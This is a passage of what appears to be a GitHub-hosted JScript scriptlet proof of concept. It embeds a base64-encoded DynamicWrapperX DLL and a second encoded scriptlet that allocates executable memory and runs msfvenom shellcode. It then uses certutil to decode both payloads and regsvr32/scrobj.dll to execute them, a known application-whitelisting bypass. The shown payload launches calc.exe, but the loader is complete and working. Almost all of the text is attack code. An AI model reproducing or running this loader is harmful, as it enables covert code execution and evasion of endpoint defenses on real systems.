qGEAAAAAAAAAAAAAIGMAAEBhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMVhAADiYQAA\
8mEAAARiAAAaYgAALGIAADpiAABIYgAAYGIAAHhiAACGYgAAlmIAAKxiAADCYgAA\
AAAAAN1iAADoYgAA8mIAAP5iAAAAAAAAEmMAAAAAAAAtYwAAPmMAAE5jAAAAAAAA\
xWEAAOJhAADyYQAABGIAABpiAAAsYgAAOmIAAEhiAABgYgAAeGIAAIZiAACWYgAA\
rGIAAMJiAAAAAAAA3WIAAOhiAADyYgAA/mIAAAAAAAASYwAAAAAAAC1jAAA+YwAA\
TmMAAAAAAABLRVJORUwzMi5kbGwAhABEaXNhYmxlVGhyZWFkTGlicmFyeUNhbGxz\
AAA6AkxvYWRMaWJyYXJ5QQAAkAFHZXRQcm9jQWRkcmVzcwAAbAFHZXRNb2R1bGVG\
aWxlTmFtZUEAAAIBR2V0Q29tbWFuZExpbmVBAOkARnJlZUxpYnJhcnkA4wFHbG9i\
YWxBbGxvYwAWAkludGVybG9ja2VkSW5jcmVtZW50AAASAkludGVybG9ja2VkRGVj\
cmVtZW50AADqAUdsb2JhbEZyZWUAAD0CTG9hZExpYnJhcnlXAAB3A1dpZGVDaGFy\
VG9NdWx0aUJ5dGUAXQJNdWx0aUJ5dGVUb1dpZGVDaGFyALwCUnRsTW92ZU1lbW9y\
eQBtc3ZjcnQuZGxsAPgCc3ByaW50ZgAABANzdHJsZW4AACgCX3djc2ljbXAAACwD\
d2NzbGVuAABvbGUzMi5kbGwA1QBJc0VxdWFsR1VJRABPTEVBVVQzMi5kbGwAWABT\
eXNBbGxvY1N0cmluZwBbAFN5c0ZyZWVTdHJpbmcAWgBTeXNBbGxvY1N0cmluZ0xl\
bgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAA1dfhIAAAAAFxwAAABAAAABQAAAAUAAABIcAAA\
NHAAAChwAAAAAAEAAgADAAQAAABpcAAAeXAAAItwAACWcAAAqHAAAB4QAABwEgAA\
UhIAADEQAADnEQAAZHlud3JhcHguZGxsAERsbENhblVubG9hZE5vdwBEbGxHZXRD\
bGFzc09iamVjdABEbGxJbnN0YWxsAERsbFJlZ2lzdGVyU2VydmVyAERsbFVucmVn\
aXN0ZXJTZXJ2ZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
ABAAAKgAAAAOMB8wJTA+MFMwYzBzMJEwmzCgMKUwCTFNMVIxVzGGMZIxoTHaMfEx\
AjISMhgyJDIqMl0yejKRMrwyzTIhMywzMzN0M4MznjOvMxg0PzS8NO829TYRN/03\
CjitOLU4wzjWODg5WjpgOmY6kzqbOqE6HTsiO0Q7ijvGOwY8FTwkPDM8QjxRPGA8\
bzx+PJA8ojy0PMY82DzqPPw8IT0rPUQ9ACAAADQAAAAoMWIxoDHaMREyVDL7NAE1\
GDWQNZY1iTaPNq82tza9NtY2JDcsNzI3SjcAAAAwAAAQAAAAKDAwMDgwRjAAQAAA\
gAEAAOgw7DDwMPQw+DD8MAAxBDEIMQwxEDEUMRgx3DHgMeQx6DHsMfwxADIEMggy\
DDIcMiAyJDIoMiwyPDJAMkQySDJMMlAyWDJcMmAyZDJoMmwyfDKAMoQyiDKMMpwy\
oDKkMqgyrDK8MsAyxDLIMswy3DLgMuQy6DLsMvwyADMEMwgzDDM4M1gzeDN8M4Az\
hDOIM4wzlDOcM6AzpDOoM6wztDO8M8AzxDPIM8wz1DPcM+Az5DPoM+wz9DP8MwA0\
BDQINAw0FDQcNCA0JDQoNCw0NDQ8NEA0RDRINEw0VDRcNGA0ZDRoNGw0dDR8NIA0\
hDSINIw0lDScNKA0pDSoNKw0tDTYNPg0GDUcNSA1JDUoNSw1MDU0NTg1PDVANUQ1\
SDVMNVA1VDVYNVw1YDVkNWg1bDWkNcg11DXYNdw1ADYMNhA2FDYYNjQ2QDZENkg2\
TDZ0NoA2hDaINow2rDa4Nrw2wDbENvw2CDcMNxA3FDdEN1A3VDdYN1w3AAAAYAAA\
NAAAAAIwCDAOMBQwGjAgMCYwLDAyMDgwPjBEMEowUDBWMFwwYjBoMG4wdDB6MIAw\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAA==\
-----END CERTIFICATE-----"
var shellcode = "-----BEGIN CERTIFICATE-----\
PD9YTUwgdmVyc2lvbj0iMS4wIj8+DQo8c2NyaXB0bGV0Pg0KPHJlZ2lzdHJhdGlv\
biANCiAgICBwcm9naWQ9IlBvQyINCiAgICBjbGFzc2lkPSJ7RjAwMDExMTEtMDAw\
MC0wMDAwLTAwMDAtMDAwMEZFRURBQ0RDfSIgPg0KCTwhLS0gUHJvb2YgT2YgQ29u\
Y2VwdCAtIENhc2V5IFNtaXRoIEBzdWJUZWUgLS0+DQoJPCEtLSAgTGljZW5zZTog\
QlNEMy1DbGF1c2UgLS0+DQoJPCEtLSAgQ2FsbCB3aXRoIEM6XFdpbmRvd3NcU3lz\
d293NjRccmVnc3ZyMzIuZXhlIC0geDg2IG9ubHkgZm9yIG5vdyAtLT4NCgk8c2Ny\
aXB0IGxhbmd1YWdlPSJKU2NyaXB0Ij4NCgkJPCFbQ0RBVEFbDQoJDQoJCQkvL0M6\
XFdpbmRvd3Ncc3lzd293NjRcY3NjcmlwdC5leGUgDQoNCgkJCURYID0gbmV3IEFj\
dGl2ZVhPYmplY3QoIkR5bmFtaWNXcmFwcGVyWCIpOyAvLyBDcmVhdGUgYW4gb2Jq\
ZWN0IGluc3RhbmNlLg0KCQkJRFguUmVnaXN0ZXIoImtlcm5lbDMyLmRsbCIsICJW\
aXJ0dWFsQWxsb2MiLCAiaT1sdXV1IiwgInI9dSIpOw0KCQkJdmFyIG1lbUxvY2F0\
aW9uID0gRFguVmlydHVhbEFsbG9jKDAsIDB4MTAwMCwgMHgxMDAwLCAweDQwICk7\
DQoJCQlEWC5SZWdpc3Rlcigia2VybmVsMzIuZGxsIiwgIkdldEN1cnJlbnRQcm9j\
ZXNzIiwgInI9aCIpOyAgICANCgkJCXZhciBwcm9jSGFuZGxlID0gRFguR2V0Q3Vy\
cmVudFByb2Nlc3MoKTsgDQoJCQkJCQkNCgkJCXZhciBzY0xvY2F0aW9uID0gRFgu\
VmlydHVhbEFsbG9jKDAsIDB4MTAwMCwgMHgxMDAwLCAweDQwICk7CQkNCgkJCS8v\
V1NjcmlwdC5FY2hvKHNjTG9jYXRpb24udG9TdHJpbmcoMTYpKTsNCgkJCS8vRFgu\
TnVtUHV0KDB4Y2Msc2NMb2NhdGlvbiwwKTsgLy9Mb29wIEhlcmUgVG8gV3JpdGUg\
QXJyYXkgb2YgU2hlbGxjb2RlDQoJCQkvL0RYLk51bVB1dCgweDkwLHNjTG9jYXRp\
b24sMSk7DQoNCgkJCS8vbXNmdmVub20gLXAgd2luZG93cy9leGVjIC1hIHg4NiAt\
LXBsYXRmb3JtIHdpbiAtZSB4ODYvc2hpa2F0YV9nYV9uYWkgLWYgY3NoYXJwIENN\
RD1jYWxjLmV4ZSBFWElURlVOQz10aHJlYWQgDQoJCQl2YXIgc2MgPSBbMHhkZCww\
eGM2LDB4YjgsMHg1MCwweDZlLDB4YzQsMHhlMiwweGQ5LDB4NzQsMHgyNCwweGY0\
LDB4NWIsMHgyYiwweGM5LDB4YjEsDQoJCQkweDMxLDB4MzEsMHg0MywweDE4LDB4\
ODMsMHhjMywweDA0LDB4MDMsMHg0MywweDQ0LDB4OGMsMHgzMSwweDFlLDB4OGMs\
MHhkMiwNCgkJCTB4YmEsMHhkZiwweDRjLDB4YjMsMHgzMywweDNhLDB4N2QsMHhm\
MywweDIwLDB4NGUsMHgyZCwweGMzLDB4MjMsMHgwMiwweGMxLA0KCQkJMHhhOCww\
eDY2LDB4YjcsMHg1MiwweGRjLDB4YWUsMHhiOCwweGQzLDB4NmIsMHg4OSwweGY3\
LDB4ZTQsMHhjMCwweGU5LDB4OTYsDQoJCQkweDY2LDB4MWIsMHgzZSwweDc5LDB4\
NTcsMHhkNCwweDMzLDB4NzgsMHg5MCwweDA5LDB4YjksMHgyOCwweDQ5LDB4NDUs\
MHg2YywNCgkJCTB4ZGQsMHhmZSwweDEzLDB4YWQsMHg1NiwweDRjLDB4YjUsMHhi\
NSwweDhiLDB4MDQsMHhiNCwweDk0LDB4MWQsMHgxZiwweGVmLA0KCQkJMHgzNiww\
eDlmLDB4Y2MsMHg5YiwweDdlLDB4ODcsMHgxMSwweGExLDB4YzksMHgzYywweGUx\
LDB4NWQsMHhjOCwweDk0LDB4MzgsDQoJCQkweDlkLDB4NjcsMHhkOSwweGY1LDB4\
NmMsMHg3OSwweDFkLDB4MzEsMHg4ZiwweDBjLDB4NTcsMHg0MiwweDMyLDB4MTcs\
MHhhYywNCgkJCTB4MzksMHhlOCwweDkyLDB4MzcsMHg5OSwweDdiLDB4MDQsMHg5\
YywweDE4LDB4YWYsMHhkMywweDU3LDB4MTYsMHgwNCwweDk3LA0KCQkJMHgzMCww\
eDNhLDB4OWIsMHg3NCwweDRiLDB4NDYsMHgxMCwweDdiLDB4OWMsMHhjZiwweDYy\
LDB4NTgsMHgzOCwweDk0LDB4MzEsDQoJCQkweGMxLDB4MTksMHg3MCwweDk3LDB4\
ZmUsMHg3YSwweGRiLDB4NDgsMHg1YiwweGYwLDB4ZjEsMHg5ZCwweGQ2LDB4NWIs\
MHg5ZiwNCgkJCTB4NjAsMHg2NCwweGU2LDB4ZWQsMHg2MywweDc2LDB4ZTksMHg0\
MSwweDBjLDB4NDcsMHg2MiwweDBlLDB4NGIsMHg1OCwweGExLA0KCQkJMHg2Yiww\
eGIzLDB4YmEsMHg2MCwweDgxLDB4NWMsMHg2MywweGUxLDB4MjgsMHgwMSwweDk0\
LDB4ZGYsMHg2ZSwweDNjLDB4MTcsDQoJCQkweGVhLDB4MGUsMHhiYiwweDA3LDB4\
OWYsMHgwYiwweDg3LDB4OGYsMHg3MywweDYxLDB4OTgsMHg2NSwweDc0LDB4ZDYs\
MHg5OSwNCgkJCTB4YWYsMHgxNywweGI5LDB4MDksMHgzMywweGY2LDB4NWMsMHhh\
YSwweGQ2LDB4MDYgIF07DQoNCg0KCQkJZm9yKHZhciBpID0gMDsgaSA8IHNjLmxl\
bmd0aDsgaSsrKQ0KCQkJew0KCQkJCURYLk51bVB1dChzY1tpXSxzY0xvY2F0aW9u\
LGkpOw0KCQkJfQ0KDQoNCgkJCURYLlJlZ2lzdGVyKCJrZXJuZWwzMi5kbGwiLCJD\
cmVhdGVUaHJlYWQiLCJpPXV1bGx1Iiwicj11IiApOw0KCQkJdmFyIHRocmVhZCA9\
IERYLkNyZWF0ZVRocmVhZCgwLDAsc2NMb2NhdGlvbiwwLDApOw0KDQoJCQlEWC5S\
ZWdpc3Rlcigia2VybmVsMzIuZGxsIiwgIldhaXRGb3JTaW5nbGVPYmplY3QiLCAi\
aT11dSIsICJyPXUiKTsNCgkJCURYLldhaXRGb3JTaW5nbGVPYmplY3QodGhyZWFk\
LDB4RkZGRkZGRkYpOw0KDQoJCQkvKg0KCQkJRFguUmVnaXN0ZXIoInVzZXIzMi5k\
bGwiLCAiTWVzc2FnZUJveFciLCAiaT1od3d1IiwgInI9bCIpOyAgLy8gUmVnaXN0\
ZXIgYSBkbGwgZnVuY3Rpb24uDQoJCQlyZXMgPSBEWC5NZXNzYWdlQm94VygwLCAi\
U2hlbGxDb2RlIEF0ICIgKyBtZW1Mb2NhdGlvbi50b1N0cmluZygxNikgLCAiVGVz\
dCIsIDQpOyAgICAgICAgLy8gQ2FsbCB0aGUgZnVuY3Rpb24uDQoJCQlyZXMgPSBE\
WC5NZXNzYWdlQm94VygwLCAiSGFuZGxlIE9idGFpbmVkICIgKyBwcm9jSGFuZGxl\
LnRvU3RyaW5nKDE2KSAsICJUZXN0IiwgNCk7ICAgICAgICAvLyBDYWxsIHRoZSBm\
dW5jdGlvbi4NCgkJCSovDQoJCQkvL2h0dHBzOi8vbXNkbi5taWNyb3NvZnQuY29t\
L2VuLXVzL2xpYnJhcnkvd2luZG93cy9kZXNrdG9wL2FhMzY2ODg3KHY9dnMuODUp\
LmFzcHgNCgkJCS8vaHR0cHM6Ly9tc2RuLm1pY3Jvc29mdC5jb20vZW4tdXMvbGli\
cmFyeS93aW5kb3dzL2Rlc2t0b3AvbXM2ODMxNzkodj12cy44NSkuYXNweA0KCQkJ\
Ly9HZXRDdXJyZW50UHJvY2Vzcw0KCQkJLy9odHRwczovL21zZG4ubWljcm9zb2Z0\
LmNvbS9lbi11cy9saWJyYXJ5L3dpbmRvd3MvZGVza3RvcC9tczY4MTY3NCh2PXZz\
Ljg1KS5hc3B4DQoJCQkvL2h0dHBzOi8vbXNkbi5taWNyb3NvZnQuY29tL2VuLXVz\
L2xpYnJhcnkvd2luZG93cy9kZXNrdG9wL21zNjgyNDUzKHY9dnMuODUpLmFzcHgN\
CgkNCgkJXV0+DQo8L3NjcmlwdD4NCjwvcmVnaXN0cmF0aW9uPg0KPC9zY3JpcHRs\
ZXQ+\
-----END CERTIFICATE-----"
var WshShell = new ActiveXObject("WScript.Shell");
var WshProcEnv = WshShell.Environment("Process");
var process_arch = WshProcEnv("PROCESSOR_ARCHITECTURE");
if(process_arch == "AMD64")
{
SaveStringToFile("DynamicWrapperX.txt", x86dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode DynamicWrapperX.txt x86.dll", 0);
sleep(5000);
var execFilex64 = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\SysWOW64\\regsvr32.exe /s /i x86.dll", 0);
SaveStringToFile("shellcode.txt", shellcode);
sleep(5000);
var x = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode shellcode.txt shellcode.sct", 0 );
sleep(5000);
var execShellCode = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\SysWOW64\\regsvr32.exe /u /i:shellcode.sct scrobj.dll", 0);
}
else
{
SaveStringToFile("DynamicWrapperX.txt", x86dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode DynamicWrapperX.txt x86.dll", 0);
sleep(5000);
var execFilex86 = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\System32\\regsvr32.exe /s /i x86.dll", 0);
SaveStringToFile("shellcode.txt", shellcode);
sleep(5000);
var x = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode shellcode.txt shellcode.sct", 0 );
sleep(5000);
var execShellCode = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\System32\\regsvr32.exe /u /i:shellcode.sct scrobj.dll", 0);
}
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment